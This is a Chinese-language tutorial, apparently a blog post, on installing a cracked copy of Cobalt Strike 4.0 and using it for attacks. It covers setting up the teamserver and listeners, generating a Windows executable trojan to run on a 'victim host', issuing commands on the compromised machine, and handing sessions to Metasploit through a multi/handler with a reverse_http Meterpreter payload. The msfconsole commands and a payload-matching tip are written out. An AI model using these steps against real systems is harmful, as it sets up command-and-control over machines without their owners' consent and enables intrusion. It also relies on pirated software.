Cobaltstrike的安装
注意:配置cs需要配置客户端和服务器
服务器端
首先下载cobaltstrike,下载完成后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,进入解压后的目录运行如下命令:
./teamserver 101.43.x.x password #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip
客户端
将cobaltstrike4.0-cracked.zip解压,双击运行start.bat
,并配置你的服务器ip和端口(默认50050),点击Connection
这里的用户名随便填,密码就是刚刚在服务器上设置的密码
连接完成界面;
Cobaltstrike的使用
Cobaltstrike和msfconsole最大的区别就是CS支持多个人一同协作(多人运动),因为是多人协作,所以需要区分一下哪些资源是各自的,通过配置监听器来实现拥有各自的监听管道
按照下图配置完成后,点击HTTP Hosts右边的+
号,最后save保存即可
到这里,监听器就配置完成了!
简单木马生成实例
下面来举一个简单的实现攻击的例子:
这里面是常见的攻击工具,我们拿下图的Windows Executable为例
配置木马的监听器,配置完成后点击Generate生成木马,将其导出即可
将该木马放到受害主机上双击运行,即可收到上线提示
命令的输入
进入图形化界面右击鼠标选择Interact,即可输入命令,输入help可以查看命令列表
例如输入一条cmd命令:
shell ipconfig
探针其他主机
net view
插件的扩展
CS本身自带的插件并不是很多,所以如果有更多需求,可以通过扩展插件来解决
Cobaltstrike与Msfconsole的联动
部署Msfconsole
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 5555 #监听5555端口
exploit
部署Cobaltstrike
1.添加一个msf监听器,HTTP Host是你的外网服务器地址,HTTP Port 自定义
2.添加一个木马监听器
3.生成木马,并选择名为wooden horse的监听器,并用木马控制目标主机(步骤省略)
4.右击受控主机,点击spawn,并选择名为msf的监听器
同时msfconsole服务器这边选择监听
use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http
这时候再去看msfconsole服务器,已经成功收到反弹会话【这里可能要等待连接的时间有点长】
这里有个坑我有必要说一下,由下图可知msf联动的监听器的payload是http的,我之前一直在msf配置windows/meterpreter/reverse_tcp,结果导致一直断开连接,连接不上,一定要注意,这边的payload是啥,对应那边就用啥!!!